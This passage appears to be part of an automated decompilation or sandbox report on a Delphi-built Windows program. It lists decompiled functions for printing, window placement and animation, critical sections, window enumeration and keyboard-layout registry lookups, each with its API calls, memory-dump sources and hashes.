                                  				void* _v76;
                                  				signed int _t91;
                                  				signed int _t117;
                                  				signed int _t121;
                                  				void* _t125;
                                  				intOrPtr _t126;
                                  				signed int _t127;
                                  				long _t128;
                                  				intOrPtr _t139;
                                  				signed int _t143;
                                  				void* _t146;
                                  				void* _t149;
                                  				void* _t151;
                                  				void* _t153;
                                  				void* _t156;
                                  				void* _t157;
                                  				intOrPtr _t158;
                                  				void* _t159;
                                  
                                  				_t159 = __eflags;
                                  				_t156 = _t157;
                                  				_t158 = _t157 + 0xffffffb8;
                                  				_push(__edi);
                                  				_t125 = __edx;
                                  				_v8 = __eax;
                                  				E00402FB0( &_v60, 0x30);
                                  				_t149 = E00432528();
                                  				_t3 = _t149 + 0x18; // 0x18
                                  				E0040442C(_t3, _t125);
                                  				E00431C90(_t149, 0, __edi, _t149, _t156, _t159);
                                  				_t126 = E0043202C(_t149);
                                  				_v60 = _t126;
                                  				_v56 = _t126;
                                  				_t127 = GetDeviceCaps(E0043202C(_t149), 0x58);
                                  				_t143 = GetDeviceCaps(E0043202C(_t149), 0x5a);
                                  				if(E0040693C(_v8 + 0x278) == 0) {
                                  					asm("cdq");
                                  					_v52 =  *(_v8 + 0x278) * 0x5a0 / _t127;
                                  					asm("cdq");
                                  					_v48 =  *(_v8 + 0x27c) * 0x5a0 / _t143;
                                  					asm("cdq");
                                  					_v44 =  *(_v8 + 0x280) * 0x5a0 / _t127;
                                  					_t91 =  *(_v8 + 0x284) * 0x5a0;
                                  					asm("cdq");
                                  					__eflags = _t91 % _t143;
                                  					_v40 = _t91 / _t143;
                                  				} else {
                                  					_t117 = E0043205C(_t149);
                                  					asm("cdq");
                                  					_v44 = _t117 * 0x5a0 / _t127;
                                  					_t121 = E00432040(_t149);
                                  					asm("cdq");
                                  					_v40 = _t121 * 0x5a0 / _t143;
                                  				}
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t151 = _t149;
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t153 = _t151;
                                  				_t128 = 0;
                                  				_t146 = E00446CB8();
                                  				_v16 = 0xffffffff;
                                  				_v12 = SetMapMode(_v60, 1);
                                  				SendMessageA(E0044D590(_v8), 0x439, 0, 0);
                                  				_push(_t156);
                                  				_push(0x46f847);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t158;
                                  				while(1) {
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_t146 = _t146;
                                  					_t153 = _t153;
                                  					_v20 = _t128;
                                  					_t128 = SendMessageA(E0044D590(_v8), 0x439, 1,  &_v60);
                                  					if(_t146 > _t128) {
                                  						_t163 = _t128 - 0xffffffff;
                                  						if(_t128 != 0xffffffff) {
                                  							E00431D4C(_t153, _t163);
                                  						}
                                  					}
                                  					if(_t146 <= _t128) {
                                  						break;
                                  					}
                                  					_t165 = _t128 - 0xffffffff;
                                  					if(_t128 != 0xffffffff) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				E00431D18(_t153, _t165);
                                  				_pop(_t139);
                                  				 *[fs:eax] = _t139;
                                  				_push(0x46f84e);
                                  				SendMessageA(E0044D590(_v8), 0x439, 0, 0);
                                  				return SetMapMode(_v60, _v12);
                                  			}

                                  APIs
                                    • Part of subcall function 00431C90: SetAbortProc.GDI32(?,Function_000316FC), ref: 00431CF9
                                    • Part of subcall function 00431C90: StartDocA.GDI32(?), ref: 00431D03
                                    • Part of subcall function 00431C90: StartFormPage.GDI32(?), ref: 00431D0C
                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0046F6CE
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0046F6DF
                                  • SetMapMode.GDI32(?,00000001), ref: 0046F79C
                                  • SendMessageA.USER32 ref: 0046F7B6
                                  • SendMessageA.USER32 ref: 0046F7EE
                                    • Part of subcall function 0043205C: GetDeviceCaps.GDI32(?,00000008), ref: 0043206E
                                    • Part of subcall function 00432040: GetDeviceCaps.GDI32(?,0000000A), ref: 00432052
                                  • SendMessageA.USER32 ref: 0046F834
                                  • SetMapMode.GDI32(?,?), ref: 0046F841
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CapsDevice$MessageSend$ModeStart$AbortFormPageProc
                                  • String ID:
                                  • API String ID: 456627103-0
                                  • Opcode ID: 85979db245c641b2fc265481dd64b6732e4ad3387eee28fb055c3411dfc9d46a
                                  • Instruction ID: fe1f0d282ea9a1a2c90c1003f83769caf3308cd02a95b7dec1d06c5787af96b8
                                  • Opcode Fuzzy Hash: 85979db245c641b2fc265481dd64b6732e4ad3387eee28fb055c3411dfc9d46a
                                  • Instruction Fuzzy Hash: 72519471A00604ABDB00EFAAD982A8EB7F5AF09314F51117AF500FB291D6B99E058B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0044EC08(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr* _v8;
                                  				void _v12;
                                  				intOrPtr _v16;
                                  				int _v24;
                                  				int _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t91;
                                  				void* _t119;
                                  				intOrPtr _t136;
                                  				intOrPtr _t145;
                                  				void* _t148;
                                  
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t119 = __ecx;
                                  				_v8 = __eax;
                                  				_t145 =  *0x4bb224; // 0x4bcb80
                                  				 *((char*)(_v8 + 0x210)) = 1;
                                  				_push(_t148);
                                  				_push(0x44ede1);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t148 + 0xffffffe0;
                                  				E00446D74(_v8, __ecx, __ecx, _t145);
                                  				_v16 = _v16 + 4;
                                  				E00447FE0(_v8,  &_v28);
                                  				if(E00464E94() <  *(_v8 + 0x4c) + _v24) {
                                  					_v24 = E00464E94() -  *(_v8 + 0x4c);
                                  				}
                                  				if(E00464EA0() <  *(_v8 + 0x48) + _v28) {
                                  					_v28 = E00464EA0() -  *(_v8 + 0x48);
                                  				}
                                  				if(E00464E88() > _v28) {
                                  					_v28 = E00464E88();
                                  				}
                                  				if(E00464E7C() > _v16) {
                                  					_v16 = E00464E7C();
                                  				}
                                  				SetWindowPos(E0044D590(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                  				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404698(_t119) < 0x64 &&  *0x4a0ce4 != 0) {
                                  					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                  					if(_v12 != 0) {
                                  						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                  						if(_v12 == 0) {
                                  							E00451EF0( &_v36);
                                  							if(_v32 <= _v24) {
                                  							}
                                  						}
                                  						 *0x4a0ce4(E0044D590(_v8), 0x64,  *0x004A0DEC | 0x00040000);
                                  					}
                                  				}
                                  				_t80 =  *0x4bb048; // 0x4bcb7c
                                  				E0044ACC4(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
                                  				ShowWindow(E0044D590(_v8), 4);
                                  				 *((intOrPtr*)( *_v8 + 0x7c))();
                                  				_pop(_t136);
                                  				 *[fs:eax] = _t136;
                                  				_push(0x44ede8);
                                  				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                  				_t91 = _v8;
                                  				 *((char*)(_t91 + 0x210)) = 0;
                                  				return _t91;
                                  			}

                                  APIs
                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010), ref: 0044ECED
                                  • GetTickCount.KERNEL32(00000000,000000FF,?,?,?,?,00000010,00000000,0044EDE1), ref: 0044ECF2
                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0044ED2D
                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0044ED45
                                  • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0044ED8B
                                  • ShowWindow.USER32(00000000,00000004), ref: 0044EDAE
                                    • Part of subcall function 00451EF0: GetCursorPos.USER32(?), ref: 00451EF4
                                  • GetTickCount.KERNEL32(0044EDE8), ref: 0044EDC8
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                  • String ID:
                                  • API String ID: 3024527889-0
                                  • Opcode ID: 4735a88d0c22d5b685d3fe8a903af22ca9d0df60c738a3066c3deabe5e8d8478
                                  • Instruction ID: 9c59585f721ada9a74454e0e0b16337c24ed4c8c98d1746030951f3d54b78439
                                  • Opcode Fuzzy Hash: 4735a88d0c22d5b685d3fe8a903af22ca9d0df60c738a3066c3deabe5e8d8478
                                  • Instruction Fuzzy Hash: D8514B74A00205EFEB10EFA9C982A9EB7F5BF48304F2045A6F500E7395D779AE40CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00416F1E(void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				char _v9;
                                  				signed int _v12;
                                  				char _v16;
                                  				signed int _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char* _v48;
                                  				char _v52;
                                  				signed int _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v320;
                                  				char _v324;
                                  				intOrPtr _t57;
                                  				intOrPtr* _t61;
                                  				intOrPtr _t65;
                                  				intOrPtr _t69;
                                  				intOrPtr _t71;
                                  				intOrPtr _t72;
                                  				intOrPtr _t73;
                                  				intOrPtr* _t76;
                                  				intOrPtr _t79;
                                  				intOrPtr _t85;
                                  				intOrPtr* _t89;
                                  				intOrPtr _t93;
                                  				intOrPtr _t102;
                                  				void* _t103;
                                  				void* _t105;
                                  				void* _t106;
                                  				intOrPtr _t107;
                                  				signed int _t114;
                                  				signed int _t115;
                                  				char _t123;
                                  				intOrPtr _t129;
                                  				signed int _t138;
                                  				intOrPtr _t145;
                                  				void* _t147;
                                  				void* _t148;
                                  				intOrPtr _t149;
                                  				void* _t160;
                                  
                                  				_t144 = __esi;
                                  				_t141 = __edi;
                                  				_t123 = __edx;
                                  				_t115 = __ecx;
                                  				_t147 = _t148;
                                  				_t149 = _t148 + 0xfffffec0;
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_v324 = 0;
                                  				_v40 = 0;
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				if(__edx != 0) {
                                  					_t149 = _t149 + 0xfffffff0;
                                  					_t57 = E00403984(_t57, _t147);
                                  				}
                                  				_v12 = _t115;
                                  				_v9 = _t123;
                                  				_v8 = _t57;
                                  				_push(_t147);
                                  				_push(0x41717d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t149;
                                  				E004035DC(0);
                                  				_push(0x4bc828);
                                  				L00406AC4();
                                  				_t116 = 0;
                                  				_push(_t147);
                                  				_push(0x417150);
                                  				_push( *[fs:ecx]);
                                  				 *[fs:ecx] = _t149;
                                  				_t114 = (_v12 & 0x0000ffff) - 0x100;
                                  				if(_t114 < 0 || _v12 < 0x10f) {
                                  					_t61 =  *0x4bb1b0; // 0x4a012c
                                  					_v28 =  *_t61;
                                  					_v24 = 0xb;
                                  					_v20 = _v12 & 0x0000ffff;
                                  					_v16 = 0;
                                  					_t65 =  *0x4bae98; // 0x40795c
                                  					E0040656C(_t65, _t116,  &_v32);
                                  					_t116 = _v32;
                                  					E0040CB00(_t114, _v32, 1, _t141, _t144, 1,  &_v28);
                                  					E00403DEC();
                                  				}
                                  				_t69 =  *0x4bc824; // 0x1c41ebc
                                  				_t145 = E0040564C(_t69);
                                  				if(_t145 <= _t114) {
                                  					asm("cdq");
                                  					_t141 = (_t114 / 0xf + 1 << 4) - _t114 / 0xf + 1;
                                  					if(_t141 > 0x7ff) {
                                  						_t107 =  *0x4badc8; // 0x407974
                                  						E0040656C(_t107, 0xf,  &_v36);
                                  						E0040CAC4(_v36, 1);
                                  						E00403DEC();
                                  					}
                                  					_push(_t141);
                                  					_t116 = 1;
                                  					E00405828();
                                  					_t102 =  *0x4bc824; // 0x1c41ebc
                                  					_t103 = E0040564C(_t102);
                                  					_t138 = _t145;
                                  					_t105 = _t103 - 1 - _t138;
                                  					if(_t105 >= 0) {
                                  						_t106 = _t105 + 1;
                                  						do {
                                  							_t116 =  *0x4bc824; // 0x1c41ebc
                                  							_t145 = 0;
                                  							 *((intOrPtr*)(_t116 + _t138 * 4)) = 0;
                                  							_t138 = _t138 + 1;
                                  							_t106 = _t106 - 1;
                                  						} while (_t106 != 0);
                                  					}
                                  				}
                                  				_t71 =  *0x4bc824; // 0x1c41ebc
                                  				_t72 =  *((intOrPtr*)(_t71 + _t114 * 4));
                                  				if(_t72 != 0) {
                                  					_t160 = _t72 -  *0x4a0474; // 0xffffffff
                                  					if(_t160 != 0) {
                                  						_t76 =  *0x4bb1b0; // 0x4a012c
                                  						_v64 =  *_t76;
                                  						_v60 = 0xb;
                                  						_v56 = _v12 & 0x0000ffff;
                                  						_v52 = 0;
                                  						_t79 =  *0x4bc824; // 0x1c41ebc
                                  						E0040355C( *((intOrPtr*)( *((intOrPtr*)(_t79 + _t114 * 4)))),  &_v320);
                                  						_v48 =  &_v320;
                                  						_v44 = 4;
                                  						_t85 =  *0x4bad10; // 0x407964
                                  						E0040656C(_t85, _t116,  &_v324);
                                  						E0040CB00(_t114, _v324, 1, _t141, _t145, 2,  &_v64);
                                  						E00403DEC();
                                  					} else {
                                  						_t89 =  *0x4bb1b0; // 0x4a012c
                                  						_v28 =  *_t89;
                                  						_v24 = 0xb;
                                  						_v20 = _v12 & 0x0000ffff;
                                  						_v16 = 0;
                                  						_t93 =  *0x4baf38; // 0x40796c
                                  						E0040656C(_t93, _t116,  &_v40);
                                  						E0040CB00(_t114, _v40, 1, _t141, _t145, 1,  &_v28);
                                  						E00403DEC();
                                  					}
                                  				}
                                  				_t73 =  *0x4bc824; // 0x1c41ebc
                                  				 *((intOrPtr*)(_t73 + _t114 * 4)) = _v8;
                                  				 *((short*)(_v8 + 4)) = _v12;
                                  				_pop(_t129);
                                  				 *[fs:eax] = _t129;
                                  				_push(E00417157);
                                  				_push(0x4bc828);
                                  				L00406C2C();
                                  				return 0;
                                  			}
                                  0x00417076
                                  0x00417122
                                  0x0041712a
                                  0x00417134
                                  0x0041713a
                                  0x0041713d
                                  0x00417140
                                  0x00417145
                                  0x0041714a
                                  0x0041714f

                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(004BC828,00000000,0041717D), ref: 00416F70
                                    • Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E
                                  • RtlLeaveCriticalSection.KERNEL32(004BC828,00417157,00417150,?,004BC828,00000000,0041717D), ref: 0041714A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveLoadString
                                  • String ID: DmA$\y@$ly@$ty@
                                  • API String ID: 2800025304-3225984291
                                  • Opcode ID: d40ac1c25d385f74094847df4d9a4eb01589728738778be10d13e0c5dd6cbc62
                                  • Instruction ID: 1abd86978a0b7f04c0c680a586c9a56a91982e78ded87e2e5c0fffbbfe0de29a
                                  • Opcode Fuzzy Hash: d40ac1c25d385f74094847df4d9a4eb01589728738778be10d13e0c5dd6cbc62
                                  • Instruction Fuzzy Hash: E3519370A042049FCB00EFA9D8C1AEEBBF5EB49704F11417AE944E7391D77A9D40CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0044467C(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				struct HWND__* _v24;
                                  				intOrPtr _v28;
                                  				void* _v32;
                                  				struct tagRECT _v48;
                                  				struct tagRECT _v64;
                                  				struct HWND__* _t53;
                                  				intOrPtr _t55;
                                  				intOrPtr _t60;
                                  				intOrPtr _t65;
                                  				intOrPtr _t79;
                                  				intOrPtr _t85;
                                  				intOrPtr _t87;
                                  				intOrPtr _t94;
                                  				intOrPtr _t99;
                                  				intOrPtr _t102;
                                  				void* _t103;
                                  				intOrPtr* _t105;
                                  				intOrPtr _t107;
                                  				intOrPtr _t111;
                                  				intOrPtr _t113;
                                  				struct HWND__* _t114;
                                  				intOrPtr _t115;
                                  				intOrPtr _t117;
                                  				intOrPtr _t118;
                                  
                                  				_t103 = __ecx;
                                  				_t102 = __eax;
                                  				_v5 = 1;
                                  				_t114 = E00444ACC(_a4 + 0xfffffff7);
                                  				_v24 = _t114;
                                  				_t53 = GetWindow(_t114, 4);
                                  				_t105 =  *0x4bb048; // 0x4bcb7c
                                  				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
                                  					L6:
                                  					if(_v24 == 0) {
                                  						L25:
                                  						return _v5;
                                  					}
                                  					_t115 = _t102;
                                  					while(1) {
                                  						_t55 =  *((intOrPtr*)(_t115 + 0x30));
                                  						if(_t55 == 0) {
                                  							break;
                                  						}
                                  						_t115 = _t55;
                                  					}
                                  					_t113 = E0044D590(_t115);
                                  					_v28 = _t113;
                                  					if(_t113 == _v24) {
                                  						goto L25;
                                  					}
                                  					_t13 = _a4 - 0x10; // 0xe87d83e8
                                  					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                                  					if(_t60 == 0) {
                                  						_t19 = _a4 - 0x10; // 0xe87d83e8
                                  						_t107 =  *0x442c24; // 0x442c70
                                  						__eflags = E004037A4( *_t19, _t107);
                                  						if(__eflags == 0) {
                                  							__eflags = 0;
                                  							_v32 = 0;
                                  						} else {
                                  							_t21 = _a4 - 0x10; // 0xe87d83e8
                                  							_v32 = E0044D590( *_t21);
                                  						}
                                  						L19:
                                  						_v12 = 0;
                                  						_t65 = _a4;
                                  						_v20 =  *((intOrPtr*)(_t65 - 9));
                                  						_v16 =  *((intOrPtr*)(_t65 - 5));
                                  						EnumThreadWindows(GetCurrentThreadId(), E00444610,  &_v32);
                                  						_t127 = _v12;
                                  						if(_v12 == 0) {
                                  							goto L25;
                                  						}
                                  						GetWindowRect(_v24,  &_v48);
                                  						_push(_a4 + 0xfffffff7);
                                  						_push(_a4 - 1);
                                  						E00403814(_t102, _t127);
                                  						_t79 =  *0x4bcafc; // 0x0
                                  						_t111 =  *0x441810; // 0x44185c
                                  						if(E004037A4(_t79, _t111) == 0) {
                                  							L23:
                                  							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                  								_v5 = 0;
                                  							}
                                  							goto L25;
                                  						}
                                  						_t85 =  *0x4bcafc; // 0x0
                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
                                  							goto L23;
                                  						}
                                  						_t87 =  *0x4bcafc; // 0x0
                                  						if(E0044D590( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
                                  							goto L25;
                                  						}
                                  						goto L23;
                                  					}
                                  					_t117 = _t60;
                                  					while(1) {
                                  						_t94 =  *((intOrPtr*)(_t117 + 0x30));
                                  						if(_t94 == 0) {
                                  							break;
                                  						}
                                  						_t117 = _t94;
                                  					}
                                  					_v32 = E0044D590(_t117);
                                  					goto L19;
                                  				}
                                  				_t118 = E00443B88(_v24, _t103);
                                  				if(_t118 == 0) {
                                  					goto L25;
                                  				} else {
                                  					while(1) {
                                  						_t99 =  *((intOrPtr*)(_t118 + 0x30));
                                  						if(_t99 == 0) {
                                  							break;
                                  						}
                                  						_t118 = _t99;
                                  					}
                                  					_v24 = E0044D590(_t118);
                                  					goto L6;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 00444ACC: WindowFromPoint.USER32 ref: 00444AD2
                                    • Part of subcall function 00444ACC: GetParent.USER32(00000000), ref: 00444AE9
                                  • GetWindow.USER32(00000000,00000004), ref: 0044469E
                                  • GetCurrentThreadId.KERNEL32(00444610,?,00000000,00000004,?,-0000000C,?), ref: 00444772
                                  • EnumThreadWindows.USER32 ref: 00444778
                                  • GetWindowRect.USER32 ref: 0044478F
                                  • IntersectRect.USER32(?,?,?), ref: 004447FD
                                    • Part of subcall function 00443B88: GetWindowThreadProcessId.USER32(00000000), ref: 00443B95
                                    • Part of subcall function 00443B88: GetCurrentProcessId.KERNEL32(?,?,00000000,004670B7,?,?,0049FF87,00000001,00467223,?,?,?,0049FF87), ref: 00443B9E
                                    • Part of subcall function 00443B88: GlobalFindAtomA.KERNEL32(00000000), ref: 00443BB3
                                    • Part of subcall function 00443B88: GetPropA.USER32(00000000,00000000), ref: 00443BCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                  • String ID: p,D
                                  • API String ID: 2202917067-3811598181
                                  • Opcode ID: af91288101caf2111d745621aaf0fcdae1df4e1378772dab820cd0a8c6ece8f7
                                  • Instruction ID: b5b42182e1fd4ed5cca896d269ba601e5c7f096501766987c8208bf9843cb462
                                  • Opcode Fuzzy Hash: af91288101caf2111d745621aaf0fcdae1df4e1378772dab820cd0a8c6ece8f7
                                  • Instruction Fuzzy Hash: CC518F75A002099FDB10DF69C880BAEB7F4AF49358F1185A6F814EB351D738ED41CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00465144(intOrPtr __eax, void* __ebx, void* __fp0) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void* _v16;
                                  				char _v20;
                                  				intOrPtr* _v24;
                                  				struct HKL__* _v280;
                                  				char _v536;
                                  				char _v600;
                                  				char _v604;
                                  				intOrPtr _v608;
                                  				char _v612;
                                  				void* _t60;
                                  				intOrPtr _t106;
                                  				intOrPtr _t111;
                                  				void* _t117;
                                  				void* _t118;
                                  				intOrPtr _t119;
                                  				void* _t129;
                                  
                                  				_t129 = __fp0;
                                  				_t117 = _t118;
                                  				_t119 = _t118 + 0xfffffda0;
                                  				_v612 = 0;
                                  				_v8 = __eax;
                                  				_push(_t117);
                                  				_push(0x4652ef);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t119;
                                  				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                  					L11:
                                  					_pop(_t106);
                                  					 *[fs:eax] = _t106;
                                  					_push(0x4652f6);
                                  					return E004043D8( &_v612);
                                  				} else {
                                  					 *((intOrPtr*)(_v8 + 0x34)) = E004035DC(1);
                                  					E004043D8(_v8 + 0x38);
                                  					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                  					if(_t60 < 0) {
                                  						L10:
                                  						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                  						E0041EE18( *((intOrPtr*)(_v8 + 0x34)), 1);
                                  						goto L11;
                                  					} else {
                                  						_v20 = _t60 + 1;
                                  						_v24 =  &_v280;
                                  						do {
                                  							if(E0045236C( *_v24) == 0) {
                                  								goto L9;
                                  							} else {
                                  								_v608 =  *_v24;
                                  								_v604 = 0;
                                  								if(RegOpenKeyExA(0x80000002, E00409AF4( &_v600, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                                  									goto L9;
                                  								} else {
                                  									_push(_t117);
                                  									_push(0x4652ab);
                                  									_push( *[fs:eax]);
                                  									 *[fs:eax] = _t119;
                                  									_v12 = 0x100;
                                  									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                  										E00404648( &_v612, 0x100,  &_v536);
                                  										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                  										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                  											E00404648(_v8 + 0x38, 0x100,  &_v536);
                                  										}
                                  									}
                                  									_pop(_t111);
                                  									 *[fs:eax] = _t111;
                                  									_push(0x4652b2);
                                  									return RegCloseKey(_v16);
                                  								}
                                  							}
                                  							goto L12;
                                  							L9:
                                  							_v24 = _v24 + 4;
                                  							_t38 =  &_v20;
                                  							 *_t38 = _v20 - 1;
                                  						} while ( *_t38 != 0);
                                  						goto L10;
                                  					}
                                  				}
                                  				L12:
                                  			}

                                  APIs
                                  • GetKeyboardLayoutList.USER32 ref: 0046519A
                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00465202
                                  • RegQueryValueExA.ADVAPI32 ref: 0046523C
                                  • RegCloseKey.ADVAPI32(?), ref: 004652A5
                                  Strings
                                  • layout text, xrefs: 00465233
                                  • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004651EC
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CloseKeyboardLayoutListOpenQueryValue
                                  • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                  • API String ID: 1703357764-2652665750
                                  • Opcode ID: 3940b42a791a8552de3f400cabc1f3b843bd877f3a4243fd0161efd17219e14d
                                  • Instruction ID: 32a58f5764b6592b7ec644c283c30acf271b0238de0e9c0c279c6990dafe81c7
                                  • Opcode Fuzzy Hash: 3940b42a791a8552de3f400cabc1f3b843bd877f3a4243fd0161efd17219e14d
                                  • Instruction Fuzzy Hash: 1A416974A006099FDB10DF95C991B9EB7F8EB48304FA140E6E904E7391E778AE40CF69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E0042C28C(void* __eax, void* __edx) {
                                  				BYTE* _v8;
                                  				int _v12;
                                  				struct HDC__* _v16;
                                  				short _v18;
                                  				signed int _v24;
                                  				short _v26;
                                  				short _v28;
                                  				char _v38;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed int _t35;
                                  				void* _t66;
                                  				intOrPtr _t68;
                                  				intOrPtr _t78;
                                  				void* _t81;
                                  				void* _t84;
                                  				void* _t86;
                                  				intOrPtr _t87;
                                  
                                  				_t84 = _t86;
                                  				_t87 = _t86 + 0xffffffdc;
                                  				_t81 = __edx;
                                  				_t66 = __eax;
                                  				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                  					return __eax;
                                  				} else {
                                  					E00402FB0( &_v38, 0x16);
                                  					_t68 =  *((intOrPtr*)(_t66 + 0x28));
                                  					_v38 = 0x9ac6cdd7;
                                  					_t35 =  *((intOrPtr*)(_t68 + 0x18));
                                  					if(_t35 != 0) {
                                  						_v24 = _t35;
                                  					} else {
                                  						_v24 = 0x60;
                                  					}
